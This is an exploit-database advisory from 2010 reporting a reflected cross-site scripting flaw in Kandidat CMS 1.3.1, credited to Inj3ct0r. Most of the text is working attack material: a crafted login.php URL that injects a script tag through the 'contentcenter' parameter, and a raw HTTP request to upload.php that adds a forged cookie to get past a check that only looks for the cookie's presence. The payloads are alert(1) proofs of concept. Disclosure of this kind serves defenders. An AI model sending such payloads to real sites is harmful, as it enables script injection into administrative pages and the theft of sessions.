Kandidat CMS versions 1.3.1 Cross Site Scripting Vulnerabili
Posted on 10 March 2010
============================================================== Kandidat CMS versions 1.3.1 Cross Site Scripting Vulnerability ============================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] support e-mail : submit[at]inj3ct0r.com Manufacturer: kan-studio.ru Product Kandidat CMS v.1.3.1 pXSS it works with register_globals = on http://kandidat/admin/login.php?contentcenter=123'%22%3E%3Cscript%3Ealert(1)%3C/script%3E in the source code is checked, only the presence of cookie : get http://kandidat/media/upload.php?contentcenter=<script>alert(1)</script> HTTP/1.0 Host: kandidat Cookie: KNcookies=123; Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Proxy-Connection: Keep-Alive # ~ - [ [ : Inj3ct0r : ] ]